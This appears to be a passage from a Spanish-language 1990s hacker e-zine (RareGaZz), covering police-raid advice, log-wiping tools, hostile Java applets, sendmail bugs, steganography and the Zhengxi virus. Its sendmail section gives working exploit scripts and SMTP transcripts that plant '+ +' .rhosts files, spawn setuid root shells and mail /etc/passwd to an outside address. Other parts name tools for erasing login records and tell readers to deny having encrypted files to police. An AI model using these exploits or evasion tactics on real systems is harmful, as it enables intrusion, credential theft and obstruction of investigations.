Ahora hablaremos de las cosas que debes y no debes hacer cuando la policia
te visite. Hay dos cosas *muy* importantes que debes hacer:
1) ­ OBTEN UN ABOGADO INMEDIATAMENTE !
El abogado debe llamar al juez y apelar a la orden de cateo. Esto no
ayuda mucho pero puede interrumpir su trabajo. El abogado debe decirte
todo lo que los policias tienen derecho a hacer y que no.
El abogado debe escribir una carta a el juez solicitando las computadoras
que te hayan sido confiscadas de regreso tan rapido como sea posible
por tu necesidad urgente de hacer negocios, etc.

2) ­ NUNCA HABLES CON LOS POLICIAS !
Los policias no pueden prometerte nada. Si te dicen que saldras del
problema si hablas no confies! Solo el juez tiene el poder de hacer esto.
Los policias solo quieren que les digas informacion que pueda ser usada
en contra tuya.
Siempre deberas negarte a ofrecer evidencia (passwords,etc) y diles que
hablen contigo a traves de tu abogado.


Entonces debes hacer un plan con tu abogado para salir del problema sin
da¤o o reducirlo.

­POR FAVOR! ten en cuenta esto: no traiciones a tus amigos. No les digas
ningun secreto.
Si lo haces sera un boomerang: tus ex-amigos se enojaran y se vengaran,
y aquellos que seran atrapados por tu culpa tambien hablaran ... y daran
a la policia mas informacion acerca de *tus* crimenes.

Pregunta si en tu pais pueden forzarte a abrir tu caja fuerte, si este es el
caso entonces debes negar tener archivos encriptados.


VII. PROGRAMAS
----------------------------------------------------------------------

Esta es una peque¤a lista de los programas que deberas obtener y usar.
No preguntes donde puedes conseguirlos, necesitas encontrarlos.

Primero un peque¤o Glosario:

Cambiar - Cambiar campos del archivo de registro por lo que quieras.
Borrar - Elimina las entradas que desees.
Editar - Un editor para el archivo de registro.
Sobre-Escribir - Sobre-escribe las entradas con valores de zero bytes.

Modificadores de Registro
~~~~~~~~~~~~~~~~~~~~~~~~~
ah-1_0b.tar Cambia las entradas de los programas de auditoria.
clear.c Borra las entradas en utmp, wtmp, lastlog y wtmpx
cloak2.c Cambia las entradas en utmp, wtmp y lastlog
invisible.c Sobre-escribe utmp, wtmp y lastlog con valores predefinidos,
asi que es mejor que zap.
marryv11.c Edita utmp, wtmp, lastlog e informacion de auditoria -Mejor!
wzap.c Borra las entradas en wtmp
wtmped.c Borra las entradas en wtmp
zap.c Sobre-escribe utmp, wtmp, lastlog - Puede ser detectado!

Por: CrackSmoker -Lider actual del grupo RdK-
Para: RareGaZz

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]


POISON JAVA
~~~~~~~~~~~

Sun Microsystems' le ha declarado la guerra a los applets java en Internet que
producen da¤os o consumen demasiados recursos de un sistema intencionalmente.
Este es el mensaje por parte de SUN en respuesta a una intensa investigacion
acerca de la seguridad de Java.

Las investigaciones se realizaron despues de que academicos, cientificos y
hackers anunciaron que algunos applets bajados del WWW presentaban graves
peligros de seguridad para los usuarios. Los applets Poison Java son hostiles,
y maliciosas trampas creados para 'husmear' en la computadora ajena usando
java como su tecnologia.

Un grupo de cientificos de la universidad de Princeton, publicaron un articulo
donde declaran "El sistema Java en su forma actual no podra asegurarse
facilmente."


Mas pruebas de los investigadores revelaron que surfeadores inocentes en la
red que 'bajaban' applets java en Netscape Navigator y el navegador de Sun
HotJava, se arriesgan a encontrar applets hostiles que interfieran con sus
computadoras (consumiendo RAM y ciclos CPU). Tambien fue descubierto que los
applets podian conectar a una tercera persona a Internet y que sin el
conocimiento de esta 'subir' informacion sensitiva de la computadora del
usuario. Hasta las mas sofisticadas 'barreras de fuego' (firewalls) pueden
ser penetradas . . . "por que el ataque es lanzado detras de la barrera,"
dijeron los cientificos.

Un lector dijo, "No tenia idea de que era posible encontrar websites que
lanzaran un ataque al navegador."
Otro dijo, "Si se permite que esto se salga
de control la gente empezara a retirarse de la red."

[ Menos gente, mas velocidad :-) ]


Una recomendacion de los cientificos es que apaguen el poder de ejecutar
applets java en sus navegadores. Los investigadores sienten que SUN y Netscape
deben de aclarar los temas sobre seguridad respecto a Java.

Los investigadores entrevistaron al guru de securidad JavaSoft, Ms. Marianne
Mueller, quien dijo "estamos tomando la seguridad muy en cuenta y trabajamos
muy duro para solucionar esos problemas."
Mueller dijo que Java necesita ser
re-escrito desde el principio. " El hecho de crear una 'caja de arena' donde
los applets puedan ejecutarse sin salirse es algo duro..."


La solucion hasta el momento es crear una caja de arena que avise al usuario
cuando un applet trate de salirse de ella. El usuario asi, podra seleccionar
continuar si se encuentra en un sitio de confianza o cancelar.

"Podemos poner mecanismos en lugar para que la interfaz del usuario pudiera
ver lo que un applet esta haciendo en su sistema de una manera amigable para
que asi pudieran ser en determinado caso, apagados los applets. Desde luego,
esto solo sirve si el applet no ha 'matado' todos los recursos."


Los expertos no creen que el problema de los applets poison o black widows se
solucione pronto, de hecho, se espera empeore. Los hackers creen que cuando
Microsoft saque al mercado la nueva version de Internet Explorer con soporte
para Java, Visual Basic scripts y a¤ada poder a la tecnologia ActiveX, los
problemas de seguridad empeoraran.

"Esta es una oportunidad de abusar, y se esta convirtiendo en un enorme
problema,"
dice Stephen Cobb, director de los proyectos especiales de la
asociacion nacional de seguridad informatica (NCSA). "Por ejemplo, la
tecnologia OLE de Microsoft ActiveX tiene un acceso mucho mas profundo en un
sistema que Java."


..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷
Algunos Bugs de Sendmail
÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷

Por: Psycho Tranze
Para: RareGaZz

Esta informacion fue recopilada de distintas fuentes en Internet y ha
sido organizada con el proposito de tener una referencia de los hoyos en
la seguridad del sistema unix en especial Sendmail.

-----------------------------------------------------------------
BUG Version de Sendmail
-----------------------------------------------------------------
= WIZ = *Vieja*
= DEBUG = *Vieja*
= TURN = *Vieja*
= OVERFLOW INPUT BUFFER = *Vieja*
= DECODE ALIAS = *?????*
= -oR SunOS = *SunOS-sendmailV5.22*
= -oM = *8lgm6Dec1994-SMI-Sendmail(sm basado en SunOS)*
= Sobre escribir archivos = *Arreglado en 5.59*
= -oQ = *?????*
= |PROGRAM = *Probado en 5.55*

= WIZ = *Vieja*

El mas viejo y facil agujero en sendmail es la puerta trasera 'wiz', y
ahora es muy dificil de encontrar. En la conexion solo escribe 'wiz' y
despues 'SHELL', y ya estaras en una shell root.

[ puede configurarse en el archivo sendmail.cf ... Opcion 'OW'
inmediatamente seguido de el password encriptado ]


= DEBUG = *Vieja*

Este bug fue usado por el gusano de internet escrito por Robert T. Morris Jr.
Este exploit permite a cualquiera ejecutar un programa en una maquina remota.
Simplemente consiste en dar el comando 'debug', usar una pipe a /bin/sh como
recipiente y alimentar los datos con los comandos que quieras ejecutar en
la maquina remota.

[ Si el servidor sendmail contesta con "200 Debug set" a el comando 'debug'
existe la oportunidad de que el bug este presente. ]

Ejemplo:

#!/bin/sh
telnet << EOF
open victima.com.mx 25
debug
mail from: </dev/null>
rcpt to: <\"|sed -e '1,/^$/'d | /bin/sh ; exit 0\">
data

cp /bin/sh /tmp/sushi # o como alternativa:
chmod 4755 /tmp/sushi # echo "+ +" >> /.rhosts
.
EOF



= TURN = *Vieja*

El comando TURN permite robar el correo ...

[ Muy viejo bug ]

= OVERFLOW INPUT BUFFER = *Vieja*

Causa que el daemon de sendmail se estrelle ...

[ Muy viejo, solo para la coleccion ;) ]

= DECODE ALIAS = *?????*

Si '/etc/aliases' contiene "|/usr/bin/uudecode" cualquiera puede enviar
correo a decode, escribir a cualquier archivo perteneciente a daemon, si
pueden conectarse a el sendmail daemon, pueden escribir a los archivos de
cualquier usuario.

Para probar la existencia de el alias decode desde una conexion sendmail:

% telnet victima.com.mx 25
Trying 127.127.127.127
Connected to target.com
Escape character is '^]'.
220 victima.com.mx Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
expn decode
250 <"|/usr/bin/uudecode">
quit

/\/ 1er Exploit \/\:
% echo "mi-servidor.com" | uuencode /usr/bin/.rhosts | mail decode@victima.com.mx

/\/ 2do Exploit \/\:

% cat > outfile # Creamos nuestro propio .rhosts
+ +
^C
% uuencode outfile /usr/bin/.rhosts
begin 644 /bin/.rhosts
$*R'K"O\

% telnet victima.com.mx 25
220 victima.com.mx SunOS Sendmail 8.6.1 #5 ready at Fri, 13 May 99 00:00 (EST)
VRFY decode
250 <|/usr/bin/uudecode>
MAIL FROM: bin
250 <bin> ... Sender Okay
RCPT TO: decode
250 <decode> ... Recipient Okay
DATA
354 Enter mail, end with "
." on a line by itself
begin 644 /bin/.rhosts
$*R'K"
O\ # Es solo "+ +" uuencoded

end
.
250 Mail accepted
quit
221 victima.com.mx closing connection
Connection closed by foreign host.
% rlogin victima.com.mx -l bin
$


Si no hay directorios conocidos o que se puedan escribir, una interesante
variacion es crear un archivos bogus /etc/aliases.pag que contenga un alias
con un comando que quieras ejecutar en tu objetivo. Esto puede funcionar
ya que en muchos sistemas los archivos aliases.pag y aliases.dir, que
controlan los alias del sistema no estan protegidos.

evil % cat decode
bin: "| cat /etc/passwd | mail raregazz@bigfoot.com"
evil % newaliases -oQ/tmp -oA`pwd`/decode
evil % uuencode decode.pag /etc/aliases.pag | mail decode@victima.com.mx
evil % /usr/lib/sendmail -fbin -om -oi bin@victima.com.mx < /dev/null


= -oR SunOS = *SunOS-4.1.X-sendmailV5.22*

La opcion -oR usa popen() para regresar el correo que no pueda ser entregado.
El impacto de este bug es que usuarios locales pueden obtener privilegios
de R00T!

-------------------------- ropt.sh ---------------------------------------

#!/bin/sh
#
# Syntax: roption servidor
#
# servidor es cualquier sisteme corriendo sendmail (excepto el host local).
#
# Este programa explota un error en SunOS sendmail(8) y trata de crear un
# root shell suid.
#
# Pon atencion al script, algunas cosas hay que modificarlas para que se
# adapte al sistema en que lo ejecutas, por ejemplo el directorio temporal.
#
# Written 1995 by [8LGM]
# Please do not use this script without permission. <-- Jah!
#

PROG="`basename $0`"
PATH=/usr/ucb:/usr/bin:/bin export PATH
IFS=" " export IFS

# Check args
if [ $# -ne 1 ]; then
echo "Syntax: $PROG host"
exit 1
fi

# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
echo "Sorry, this only works on SunOS"
exit 1
fi

PROG="`basename $0`"

EXECME=/tmp/HotterThanMojaveInMyHeart

# Create EXECME.c

cat > $EXECME.c << 'EOF'
main(argc,argv)
int argc;
char *argv[];
{
chown("/tmp/InfamousAngel", 0, 0);
chmod("/tmp/InfamousAngel", 04755);
}
EOF

cc -o $EXECME $EXECME.c

# Check we have EXECME

if [ ! -x $EXECME ]; then
echo "$PROG: couldnt compile $EXECME.c - check it out"
exit 1
fi

/bin/cp /bin/sh /tmp/InfamousAngel
# Run sendmail

/usr/lib/sendmail -oR$1 -f";$EXECME;" -t << 'EOF'
To: No1InParticular

Hows it goin
EOF

exec /tmp/InfamousAngel

................................Corta..Aqui..................................


= -oM = *8lgm6Dec1994-SMI-Sendmail(based on SunOS sm)*

El sendmail de Sun permite la opcion -oM para crear cualquier macro, y aun
retiene el privilegio root. (La lista de macros 'confiados' -trusted- debe
ser limitada)

Los sendmails afectados son "SunOS 4.x Sendmail - y la ultima version de
diciembre de 1994.

EXPLOIT:

1. Crea el archivo sunsendmailcp
------------------------corta aqui----------------------------
#!/bin/sh
#
# sunsendmailcp remitente destino

if [ $# -ne 2 ]; then
echo usage: `basename $0` from to
exit 1
fi

rm -f /usr/tmp/dead.letter
if [ -f /usr/tmp/dead.letter ]; then
echo sorry, cant continue - /usr/tmp/dead.letter exists
fi

if [ ! -r $1 ]; then
echo $1 doesnt exist or is unreadable
exit 1
fi

ln -s $2 /usr/tmp/dead.letter
/usr/lib/sendmail -L0 '-oM#anything' $USER < $1
rm /usr/tmp/dead.letter
exit 0
------------------------corta aqui----------------------------

2. Ejecuta el comando

% ./sunsendmailcp archivofuente archivodestino

y el archivo destino sera creado o si existe sera continuado.

= Sobre escribe archivos = *Arreglado en 5.59*

Usuarios remotos pueden escribir en cualquier archivo que NO tenga privilegio
de root.

telnet victima.com 25
rcpt to: /home/zen/.rhosts
mail from: zen
data
cualquier cosa
.
rcpt to: /home/zen/.rhosts
mail from: zen
data
+ +
.
quit

% rlogin victima.com -l zen
Welcome to victima.com!
victima %




= '-oQ' = *?????*

Este error involucra a las opciones '-q' y '-oQ' causando que cualquier
archivo pueda ser borrado o leido.
Debes crear un tipo de archivo 'qf' en el directorio /usr/spool/mqueue como
este:

P28
T599831504
Dfilename
Suser
Ruser
H?P?return-path: <user>
H?F?from: user (User Name)
H?x?full-name: User Name
HTo: user
Hsubject: Gotcha

despues que el comando 'sendmail -q -oQ' es ejecutado, el 'filename' es
borrado y sus contenidos mandados a 'user'.

- - - -
El 'oQ' usa la opcion Q que escoge en que directorio poner los mensajes
marcados para futuro envio.
La opcion 'q' hace que daemon procese los mensajes en espera.
- - - -



= '|PROGRAM ' = *Probado en 5.55*

Cualquiera puede especificar comandos arbitrarios shells o paths para la
direccion destino y/o remitente.

Un ataque tipico para obtener el archivo de passwords es:

% telnet victima.com 25
Trying 123.456.789.0...
Connected to victima.com
Escape character is '^]'.
220 victima.com Sendmail 5.55 ready at Mon, 12 Dec 93 23:51
mail from: "
|/bin/mail hacker@miservidor.com < /etc/passwd"
250 "
|/bin/mail hacker@miservidor.com < /etc/passwd"... Sender ok
rcpt to: mickeymouse
550 mickeymouse... User unknown
data
354 Enter mail, end with "
." on a line by itself
.
250 Mail accepted
quit
Connection closed by foreign host.
%

[Psycho Tranze nos prometio algunos mas nuevos para el siguiente numero :-)]

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]


IMPLEMENTACIONES
-= DE LA =-
ESTEGANOGRAFIA

Para aquellos que no sepan, la esteganografia (steganography) es una tecnica
cryptografica que simplemente esconde mensajes dentro de mensajes. El
remitente crea un mensaje nada sospechoso y despues, usando una de muchas
tacticas, inyecta el mensaje secreto dentro de el. Algunas tecnicas son:
Tintas invisibles, distorcion de caracteres, diferencias de escritura,
cambiado de bits, etc... El metodo especificado en este articulo es una
bien conocida implementacion esteganografica, nivel bajo de cambio de bits
en imagenes graficas.

Esteganografia es una tecnica para esconder datos en otros datos. El metodo
general es cambiar bits para que leyendo el nuvel bajo de cada 8 bytes se
obtenga un caracter. Esto permite a uno usar un archivo de imagen o sonido
para esconder archivos, resultando en un peque¤o bit de ruido que pasa des-
apercibido y en un archivo de datos guardado que luego podra ser extraido.
Este papel describe un metodo para esconder archivos mas seguro, el metodo
se llama dispersion pseudo-al hazar (pseudo-random dispersion).

Ordinariamente, si alguien sospecha que tienes archivos de datos escondidos,
digamos en un GIF solo tendrian que ejecutar el extractor apropiado y
encontrar los datos. Si los datos no estan encriptados, estara el archivo
'desnudo' para que cualquiera lo vea.
Esto puede ser aminorado usando una proteccion simple de password,escondiendo
el password en el archivo GIF como encabezado, encriptandolo primero con el
mismo. Si alguien no sabe el password, no podran extraer la informacion. Esto
es desde luego razonablemente seguro, dependiendo en la encripcion usada, y
lo recomiendo. Pero los archivos escondidos pueden estar mas seguros.

La dispersion Pseudo-Hazar trabaja escondiendo un password, y una semilla de
un generador de numeros aleatorios en el encabezado encriptado. Entonces,
un generador aleatorio de bytes es pasado, antes de que los bytes en el
nivel bajo sean cambiados.

Para hacer esto, uno primero debe calcular cuantos bytes un bit puede ocupar
por el mismo. Por ejemplo, para esconder un mensaje de 800 caracteres en un
GIF significaria que cada caracter necesita 8 bytes (8 bits por caracter, 1
byte por cada bit de orden bajo), asi que necesitarias 6,400 bytes de datos
para esconder el mensaje en, 8 bytes por caracter. Digamos que tenemos un
GIF que tiene por lo menos 10 veces este tama¤o: 64,000 bytes. Asi, tenemos
80 bytes por caractero para esconder datos. Como cada bit toma un byte,
­tendriamos 10 bytes por cada bit para esconder datos! Asi pues, si tomamos
un pseudo-generador aleatorio de numeros entre 1 y 10, y usamos ese byte para
esconder nuestro bit de nivel bajo, hemos alcanzado dispersar un mensaje a
traves del GIF en una forma aleatoria, mucho mas dificil de extraer.

Una mejora puede hacerse a este algoritmo. Re-calculando el numero disponible
de bytes en cada bit despues de que cada bit es escondido, los datos son
dispersados mas parejo sobre el archivo, en lugar de amontonar los datos
al principio, que seria una ocurrencia normal. Si usas un generador aleatorio
de numeros, escogiendo numeros del 0-9, despues, los valores se normalizaran
a 5.Esto ocasionaria que el mensaje escondido quedara amontonado al principio
del GIF.Si recalculamos cada vez el numero disponible de bytes dispersariamos
los datos por todo el archivo, con el extra bono de que los bits se dispersen
mas aparte que los primeros, resultando en posibles espacios de busqueda de
20, 32, 100, o hasta 1,000 posibles bytes por bit. Esto tambien sirve para
hacer los datos mucho mas dificiles de extraer.

Recomiendo tener un encabezado lo suficientemente largo como para un password
de 8 caracteres ASCII, una semilla integral de numeros aleatorios, un numero
integral de version, y un lugar en blanco para futuros usos. El numero de
version nos permite compatibilizar con previas versiones de el programa. El
encabezado debe estar encriptado y sin dispersar.

Es util hacer el extractor de una manera que siempre extraiga algo, sin
importar que el password sea el correcto o no. Hacer esto significa que es
imposible saber si has adivinado un password correcto y has obtenido los
datos o solo basura que parecen datos encriptados. El uso de un password
puede ser opcional. Un simple default password puede ser usado en estos
casos. Cuando escondas datos encriptados, no hay diferencia para el ojo
simple entre basura o datos, asi que el password no es extrictamente
necesario. Esto significa que no tendras que memorizar ningun password,
o transmitirlo a otras personas.

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

èèèèèèèèèèèèèèèèèèèèèèèèèèè
El padre de todos los virus
êêêêêêêêêêêêêêêêêêêêêêêêêêê

Primera Parte

El virus Zhengxi es un virus parasitico, residente, infecto de ficheros EXE y
OBJ, polimorfico y stealth. Ademas, inserta droppers en formato COM en los
ficheros ZIP, ARJ y RAR, ademas de los EXE self-extracting.
Su tama¤o es de tan solo 7k, y se trata de un virus muy complejo,
probablemente el virus mas complejo que existe. Infecta ficheros EXE, y lo
hace de dos formas: o bien de forma parasitica (es decir, modificando la
cabecera y escribiendo su codigo al final del fichero) o bien, tras haber
encontrado subrutinas de tipo C o Pascal en el fichero, sobreescribiendo una
rutina del mismo tipo con un cargador del virus, y escribiendo la rutina
original y el cuerpo encriptado del virus al final.
Tambien, como dijimos, inserta su codigo en los ficheros OBJ. Los ficheros
OBJ son creados por el compilador de ensamblador TASM y necesitan ser
linkados con el programa Link que compila estos ficheros y los convierte en
ejecutables. Cuando estos archivos son linkados se convierten en ficheros EXE
infectados.
Por ultimo, el virus tambien introduce droppers en formato COM en los
ficheros comprimidos con ZIP, ARJ o RAR usando rutinas internas de
descompresion.
Asi pues, tenemos que el virus usa cuatro tipos de infeccion: EXE appending,
EXE inserting, OBJ, y droppers COM. Parece como si pretendiese ser, y de
hecho lo es, un "
todo en uno", recogiendo en su codigo diversas ideas que
aparecieron previamente en otros virus: Infeccion de OBJ (del virus Shifting
Objective, de Stormbringer), de ficheros comprimidos (como el virus
Dementia), y de EXE con rutinas tipo C o Pascal (del tipos Lucretia).

La rutina de desencriptado es mas compleja que la de Eugene Kaspersky y, con
toda probabilidad, el resto del mundo no ha visto rutinas tan complejas que
las que se pueden ver observando el codigo de un EXE infectado. Parece como
si fuese una rutina generada por la engine SMEG, de Black Baron, pero muy
mejorada y mil veces mas compleja (hay muchisimas llamadas a rutinas basura,
funciones CP/M y de la int 21h, incluyendo llamadas directas a la tabla de
vectores de interrupcion). Esta primera rutina de desencriptado nos descubre
otra rutina mas (el virus esta encriptado con dos loops polimorficos
complejisimos), que finalmente nos descubre el codigo virico. La suma total
de la longitud de estas rutinas de desencriptado asciende a mas de 2k.
Tras tracear durante horas a traves de estas subrutinas, montones de
instrucciones basuras y llamadas a funciones del DOS, el cuerpo del virus
aparece por fin desencriptado, y en el podemos apreciar las siguientes
cadenas de texto: Abnormal program termination The virus/DOS 0.54 Copyright
(c) 1995 Zhengxi Ltd Warning! This program for internal use only!

El estilo en que esta escrito el codigo del virus es tan extremadamente
complejo que resulta dificil encontrar el proposito de mas de cien de sus
subrutinas, asi como de varios cientos de ramificaciones de las mismas. El
virus usa dos tipos distintos de referencias para dirigirse a los mismos
datos: El acceso directo a la direccion y el acceso indexado. A veces el
virus usa la primera variante y a veces la segunda, e incluso los mejores
desensambladores (Sourcer, IDA...) no pueden construir las tablas de
referencia que nos resultan tan utiles de cara al analizar el codigo de un
virus.
El virus tambien usa ramificaciones "
escondidas" y es muy dificil de
encontrar la direccion destino de estas ramificaciones ya que hay varias
combinaciones posibles.
El virus presta especial atencion a varios ficheros, pero, a diferencia del
resto de los virus que conocemos, no contiene sus nombres entre el codigo
virico, sino que contiene palabras (2 bytes) CRC para cada uno de los
nombres. Cuando se accede a un fichero, el virus calcula el CRC de cinco
caracteres cualesquiera del nombre de dicho fichero, obteniendo asi una
palabra CRC, que va comparando con las correspondientes a los ficheros que
requieren una atencion especial por su parte, y que se encuentran entre el
codigo virico, tambien en formato CRC. Asi, tenemos que el virus "
empaqueta"
cinco caracteres del nombre del fichero en tan solo 2 bytes de suma CRC. La
rutina inversa a esta que usa el virus genera aproximadamente 25000 variantes
de nombres posibles. El fichero resultante con todas estas combinaciones
ocupa mas de 400k, con lo que nos podemos ir haciendo una idea de la
complejidad del virus.
El virus tiene almacenadas 16 palabras CRC, es decir, a fin de cuentas, 16
nombres de ficheros a los que presta una atencion especial por distintos
motivos. Ahora mismo hay 11 de esos 16 nombres encontrados, es decir, que se
ha averiguado a que programa corresponden:

UUENC UUENCODE
PKLIT PKLITE
LZEXE LZEXE.EXE
NDD.E NDD.EXE
DIET. DIET.EXE
AFD.E AFD.EXE
SD.EX SD.EXE
SPEED SPEEDDSK.EXE
DEFRA DEFRAG.EXE
TLINK TLINK.EXE
LINK. LINK.EXE

Tras haber encontrado la mayor parte de los nombres, aun nos espera otro
plato fuerte: el virus tambien usa CRCs para analizar la cabecera de los
ficheros antes de infectarlos. El Zhengxi tiene una tabla que consta de ocho
CRCs (y ya van 24 en total); el proceso de comprobacion de ficheros validos
para infectar consiste en calcular la suma de los CRC de los cuatro primeros
bytes de la cabecera y compararla con los CRCs de su tabla. Tras hacer esto,
repite el proceso, disminuyendo el numero de bytes al calcular la cabecera
hasta dos y uno.

Con la rutina inversa encontramos muy rapido cuatro de las ocho variantes: la
variante de un byte, de la cabecera OBJ (80h), dos variantes de dos bytes
correspondientes a la cabecera EXE ("
MZ" y "ZM"), y otra mas de dos bytes, la
de los ficheros comprimidos con ARJ (60eah). El resto de las variantes era
las de cabeceras de cuatro bytes, y aparecieron dos de ellas: la de ficheros
ZIP (504b0304h), y la del RAR (Rar!). Las otras dos cabeceras que faltan de
momento no estan identificadas. La primera de ellas parece corresponder a los
ficheros generados por otro compresor, ya que la rutina que le da el control
esta muy cerca de las rutinas de descompresion de ARJ, ZIP y RAR, ademas de
usar las mismas subrutinas de infeccion que estas. Por estos mismos motivos,
tambien parece ser que la octava y ultima variante que hace falta este
relacionada con los ficheros de formato OBJ.
Para encontrar estas variantes, la rutina inversa estuvo trabajando dos dias
seguidos y sin interrupcion en un 486/66 MHZ. El resultado fue de nada mas y
nada menos que 65000 variantes para cada suma CRC. Ademas, como los bytes
estan "
empaquetados" dentro de dos bytes CRC, la operacion inversa nos da
65000 variantes de cada fuente de cuatro bytes. Los ficheros resultantes y
correspondientes a cada suma CRC ocupaban mas de 1MB de longitud. Ni que
decir tiene que las combinaciones posibles ascendian a mas de 260000
(65000*4). A pesar de esto, ya conocemos seis de ocho.

El codigo del virus recibe el control desde distintos puntos, dependiendo del
modo de infeccion, perp de todas formas el destino siempre es la rutina
polimorfica de desencriptado. En los ficheros EXE (appending) la rutina de
desencriptado recibe el control inmediatamente cuando el EXE es cargado en
memoria para ejecutarse; en los ficheros EXE (inserting) esta recibe el
control del cargador del virus; en los ficheros OBJ compilados desde un call,
y por ultimo en los droppers formato COM, la ejecucion comienza con un jmp,
que salta directamente al desencriptado.
Una vez desencriptado, la rutina de instalacion del virus recibe el control.
Primero el virus mueve su codigo para asi alinearse por parrafos (16 bytes);
engancha a la int 1 (traceo paso a paso), y tracea la int 21h.
El virus llama a una funcion bastante inusual para hacerlo: la llamada 19h
del CP/M (obtener unidad actual). Esta llamada le da el control al handler de
la int 21h original del DOS tras haber ejecutado algunas instrucciones y
entonces es cuando el virus empieza a tracear al codigo de la int 21h
original.
Al tracear este codigo, el handler es interrumpido tras cada instruccion
ejecutada. El virus entonces recibe el control y calcula el CRC (una vez mas)
de 12 bytes del codigo de la int 21h. Si el CRC es igual a una de dos
posibles variantes, el virus parchea este codigo, y se instala residente en
memoria.
Es absolutamente imposible encontrar las variantes de codigo que busca el
virus. Los 12 bytes de codigo estan empaquetados en 2 bytes de posibles
variantes, la primera y la segunda. El resultado de la operacion inversa nos
da mas de 2*10000000000h variantes de codigo...y no, no me he equivocado al
poner la "
h" despues del numero... no es un numero binario ni decimal, sino
hexadecimal. Por tanto tenemos que el unico medio de investigacion consiste
en probar diferentes DOSs en diferentos modos (alto o bajo), y mirar como ha
parcheado el virus la int 21h.
Por el momento solo se encontro una variante de codigo que parchea el virus,
y que se corresponde con parte del handler de la int 21h del DOS 5.x/6.x; el
dump hexadecimal es asi: 06 1E 55 57 56 52 51 53 50 8C D8 (push/push/../push/
mov ax,ds)
Si el virus encuentra este codigo, comprueba distintas condiciones antes de
hacer el parcheo y termina su instalacion.

La instalacion del virus consiste en reubicar el bloque de memoria del
sistema usando las funciones del DOS ChangeMem y AllocateMem (int 21h,
ah=4ah, 48h), dejando para la copia residente del virus, y entonces almacena
en su codigo 11 bytes de la direccion del handler de la int 21h para luego
parchear el codigo de esta int con un far call (2fh ffh 1eh ?? ??).
¨Y cual es la direccion a la que apunta este far call? Cualquiera con un
minimo de idea responderia que a su propio handler de la int 21h. Pues de eso
nada. El destino es la direccion de la int 25h (absolute disk read).

La siguiente sorpresa consiste en que el virus guarda los cincos primeros
bytes del handler de la int 25h, y escribe alli cinco bytes nuevos, que
conforman un far jmp al codigo virico. El resultado queda asi:

El virus usa una "
palabra magica", 06c7h, justo despues del call far a la
direccion de la int 25h. En principio no parece haber otra razon para hacerlo
que para ocultar el codigo desensamblado. El resultado de este parcheo es un
codigo normal, sin comandos extra¤os.
Por lo tanto el virus tiene el mismo handler para interceptar la int 21h y la
int 25h. Para separar las llamadas a ambas ints, el virus chequea la
direccion del programa que las llama (caller_ip); si la llamada va dirigida
a la int 21h, el virus le pasa el control a la rutina del handler de la int
21h propia. En otro caso, el que recibe el control es el handler que usa
el virus para la int 25h.

Por cierto, se habran dado cuenta que el virus no usa ningun chequeo de
instalacion para evitar irse residente mas de una vez. La razon es simple, ya
que antes de instalarse, el virus busca codigo especifico en el handler de la
int 21h y lo modifica. Una vez instalado, ese codigo ya no estara presente,
por lo que el virus no se re-instalara.
La rutina de instalacion esta completa; el codigo virico esta copiado en un
bloque de memoria del sistema y las ints 21h y 25h ya estan interceptadas.
Pero aun falta por decir que el virus es capaz de mover su codigo a otros
bloques de memoria (ver el analisis del handler de la int 21h). Por tanto
la copia residente del virus no ocupa los mismos bloques de memoria del
sistema, y puede moverse a otras direcciones incluyendo las del UMB.

Una vez instalado, el virus retorna el control al fichero host. Este tiene
tres metodos distintos de hacer dicho retorno, dependiendo del tipo de
infeccion. En caso de haberse instalado desde el dropper COM, el virus
se limita a ense¤ar el siguiente mensaje:

Continua en RareGaZz #5 <--- Parece novela...shit!

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³
³ ¨Es Windows un Virus? ³
³ ³
